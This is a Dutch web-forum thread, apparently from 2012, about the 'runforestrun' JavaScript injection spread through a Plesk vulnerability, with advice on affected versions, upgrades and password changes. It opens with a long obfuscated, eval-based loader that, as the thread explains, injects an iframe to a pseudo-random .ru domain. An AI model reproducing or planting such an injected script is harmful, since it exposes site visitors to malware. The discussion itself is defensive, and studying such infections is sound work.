48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,52,56,53,44,54,53,52,44,53,48,53,44,53,50,50,44,52,56,53,44,54,57,48,44,51,51,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,56,52,44,53,56,53,44,54,48,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,56,53,44,54,54,48,44,53,50,53,44,55,50,48,44,49,54,48,44,51,54,54,44,49,54,48,44,52,54,50,44,52,56,53,44,54,57,54,44,53,50,48,44,50,55,54,44,53,55,48,44,54,54,54,44,53,56,53,44,54,54,48,44,53,48,48,44,50,52,48,44,50,49,53,44,54,54,48,44,53,48,53,44,55,49,52,44,49,54,48,44,52,48,56,44,52,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,50,48,53,44,50,56,50,44,50,52,53,44,50,56,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,56,53,44,54,51,48,44,53,53,48,44,52,54,56,44,52,56,53,44,54,53,52,44,53,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,49,53,44,54,48,54,44,53,53,48,44,54,48,54,44,53,55,48,44,53,56,50,44,53,56,48,44,54,48,54,44,52,48,48,44,54,57,48,44,53,48,53,44,55,48,50,44,53,48,48,44,54,54,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,49,53,44,54,57,54,44,53,55,48,44,54,51,48,44,53,53,48,44,54,49,56,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,54,52,44,49,54,48,44,50,57,52,44,50,55,48,44,50,54,52,44,49,54,48,44,50,51,52,44,53,55,48,44,55,48,50,44,49,57,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,49,54,48,44,51,54,54,44,49,54,48,44,54,48,48,44,53,53,53,44,53,57,52,44,53,56,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,55,54,44,52,57,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,51,52,53,44,54,52,56,44,53,48,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,52,48,44,49,55,48,44,52,51,56,44,51,53,48,44,52,57,50,44,51,50,53,44,52,54,50,44,51,52,53,44,50,48,52,44,50,48,53,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,48,53,44,54,57,54,44,51,50,53,44,54,57,54,44,53,56,48,44,54,56,52,44,53,50,53,44,53,56,56,44,53,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,49,55,48,44,54,57,48,44,53,55,48,44,53,57,52,44,49,55,48,44,50,54,52,44,49,54,48,44,50,48,52,44,53,50,48,44,54,57,54,44,53,56,48,44,54,55,50,44,50,57,48,44,50,56,50,44,50,51,53,44,50,48,52,44,50,49,53,44,54,48,48,44,53,53,53,44,54,53,52,44,52,56,53,44,54,51,48,44,53,53,48,44,52,54,56,44,52,56,53,44,54,53,52,44,53,48,53,44,50,53,56,44,49,55,48,44,50,56,50,44,53,55,48,44,55,48,50,44,53,53,48,44,54,49,50,44,53,53,53,44,54,56,52,44,53,48,53,44,54,57,48,44,53,56,48,44,54,56,52,44,53,56,53,44,54,54,48,44,51,49,53,44,54,57,48,44,53,50,53,44,54,48,48,44,51,48,53,44,53,56,56,44,53,53,53,44,54,57,54,44,53,53,48,44,54,48,54,44,53,56,48,44,51,48,48,44,49,55,48,44,50,52,54,44,50,57,53,44,49,57,50,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,53,52,53,44,50,55,54,44,53,55,53,44,54,57,54,44,54,48,53,44,54,52,56,44,53,48,53,44,50,55,54,44,53,57,53,44,54,51,48,44,53,48,48,44,54,57,54,44,53,50,48,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,50,56,56,44,53,54,48,44,55,50,48,44,49,55,48,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,56,48,44,55,50,54,44,53,52,48,44,54,48,54,44,50,51,48,44,54,50,52,44,53,48,53,44,54,51,48,44,53,49,53,44,54,50,52,44,53,56,48,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,50,56,56,44,53,54,48,44,55,50,48,44,49,55,48,44,51,53,52,44,49,54,48,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,50,53,44,54,49,50,44,53,55,48,44,54,53,52,44,50,51,48,44,54,57,48,44,53,56,48,44,55,50,54,44,53,52,48,44,54,48,54,44,50,51,48,44,55,48,56,44,53,50,53,44,54,57,48,44,53,50,53,44,53,56,56,44,53,50,53,44,54,52,56,44,53,50,53,44,54,57,54,44,54,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,49,55,48,44,54,50,52,44,53,50,53,44,54,48,48,44,53,48,48,44,54,48,54,44,53,53,48,44,50,48,52,44,50,57,53,44,49,57,50,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,48,48,44,53,53,53,44,53,57,52,44,53,56,53,44,54,53,52,44,53,48,53,44,54,54,48,44,53,56,48,44,50,55,54,44,52,57,48,44,54,54,54,44,53,48,48,44,55,50,54,44,50,51,48,44,53,56,50,44,53,54,48,44,54,55,50,44,53,48,53,44,54,54,48,44,53,48,48,44,52,48,50,44,53,50,48,44,54,51,48,44,53,52,48,44,54,48,48,44,50,48,48,44,54,51,48,44,53,49,48,44,54,56,52,44,53,52,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,54,50,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,54,50,53,44,53,57,52,44,52,56,53,44,54,57,54,44,52,57,53,44,54,50,52,44,50,48,48,44,54,48,54,44,50,48,53,44,55,51,56,44,54,50,53,44,54,48,44,54,50,53,44,50,54,52,44,49,54,48,44,51,49,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,93,59,118,61,34,101,118,97,34,59,125,105,102,40,118,41,101,61,119,105,110,100,111,119,91,118,43,34,108,34,93,59,119,61,102,59,115,61,91,93,59,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10));/*qhk6sa6g1c*/</script>
 
PHP hulp

PHP hulp

07/05/2024 06:05:55
 
Q S

Q S

09/07/2012 09:44:51
Quote Anchor link
Ik heb m vorige week ook gehad die website draait op een server die te beheren is met Plesk. Blijkt dat daar een lek in de Filemanager zit.
 
John Cena

John Cena

09/07/2012 09:52:58
Quote Anchor link
Klopt, daar draait Plesk op. Hoe is dat nu tegen te gaan? En, hebben ze nu bij alle wachtwoorden kunnen kijken van API's etc?
 
De VeeWee

de VeeWee

09/07/2012 09:54:24
Quote Anchor link
Dat script zet een iframe op uw website met als link:
http://wakvnkyzkyietkdr.ru/runforestrun?sid=botnet2

Deze domeinnaam is random gegenereeerd door het script en zal dus bij een nslookup dikwijls geen record opleveren, omdat de domeinnaam bijvoorbeeld nog niet geregistreerd is.

Als je die javascript string gewoon output, krijg je dus die runforestrun injectie met een pseudo-random domain. Meer info hier over op:
http://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/

Als je dan naar de comments gaat kijken, dan zie je dat dat inderdaad in Plesk een fout is.

Quote:
To webmasters: If your site is affected by this hack, contact your hosting provider ASAP and show them this post. Change your account passwords. And if your host resets your passwords there is a good reason for that. Don’t change your passwords back to your old ones!


Vooral dit is interessant:
Quote:
Many admins do not realize that their passwords have been spied out weeks or months ago. To make it more clear: Due to the Plesk vulnerability database tables could be read. And unfortunately all Passwords in Plesk are stored in plain text!! Take a look in database ‘psa‘ at table ‘accounts‘ (and better sit down before doing that!). That’s why it is so important to change ALL passwords.


De hacker is dus met al de plain-text wachtwoorden gaan lopen.
Best plex upgraden zodat deze bug niet meer mogelijk is, of uw hosting firma contacteren om dit te doen.
 
John Cena

John Cena

09/07/2012 10:01:00
Quote Anchor link
Hmm, zal mijn hoster dit laten weten.

Is het mogelijk dat de hackz0rs met alle wachtwoorden zijn gaan lopen van API's, databases etc?
 
De VeeWee

de VeeWee

09/07/2012 10:07:27
Quote Anchor link
Volgens wat ik hier over gelezen heb, is dit een fout in plesk. Dit wilt zeggen dat ze dus van alle accounts in plesk de gegevens hebben. Dus van alle websites, managers, ...

Het zou over een sql injection gaan. Normaal worden de mysql wachtwoorden apart opgeslagen. Ik denk dus niet dat ze aan de database van uw website zelf geraken.

Vanaf het moment dat die plesk installatie gekraakt is, hebben ze alle wachtwoorden. Daarna wordt die js geinjecteerd in alle pagina's. Die zorgt er voor dat gebruikers een valse versie van bijvoorbeeld AV wordt aangeboden.

Ik lees echter niets over het bemachtigen van databases van de websites zelf.

Nog meer info over die runforestrun:
https://isc.sans.edu/diary/Run+Forest+Update+/13561

Misschien toch best op zeker spelen en deze wijzigen?
Gewijzigd op 09/07/2012 10:09:10 door de VeeWee
 
John Cena

John Cena

09/07/2012 10:12:16
Quote Anchor link
Wachtwoorden van SQL staan in een bestand op de server zelf, daar zijn ze dan waarschijnlijk ook bij geweest?
 
Elwin - Fratsloos

Elwin - Fratsloos

09/07/2012 10:16:42
Quote Anchor link
Over welke versie van Plesk gaat dit?
 
De VeeWee

de VeeWee

09/07/2012 10:19:30
Quote Anchor link
http://kb.parallels.com/en/113321:

Plesk 7.5.x Reloaded
Plesk 7.1.x Reloaded
Plesk 7.0.x
Parallels Plesk Panel 9.x for Linux/Unix
Parallels Plesk Panel 8.x for Linux/Unix
Plesk 7.x for Windows
Parallels Plesk Panel 9.x for Windows
Parallels Plesk Panel 8.x for Windows
Parallels Plesk Panel 10.3 for Windows
Parallels Plesk Panel 10.2 for Windows
Parallels Plesk Panel 10.1 for Windows
Parallels Plesk Panel 10.0.x for Windows
Parallels Plesk Panel 10.3 for Linux/Unix
Parallels Plesk Panel 10.2 for Linux/Unix
Parallels Plesk Panel 10.1 for Linux/Unix
Parallels Plesk Panel 10.0.x for Linux/Unix

Volgens mij zijn ze niet naar die mysql op zoek gegaan. Het is natuurlijk mogelijk.
Het zou over de plesk gebruikers/websites gaan en hun ftp records.
Misschien kan je deze toch best aanpassen om zeker te zijn?
 
Elwin - Fratsloos

Elwin - Fratsloos

09/07/2012 10:32:04
Quote Anchor link
Thx voor de link. :)
Vannacht met een van de servers naar 10.4.4 geüpgrade. De anderen toch ook maar z.s.m. :)
 
De VeeWee

de VeeWee

09/07/2012 10:34:05
Quote Anchor link
In versie 11, die nog maar net uit is, staan de wachtwoorden eindelijk geëncrypteerd. Misschien even overwegen om direct naar de 11 te upgraden?
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.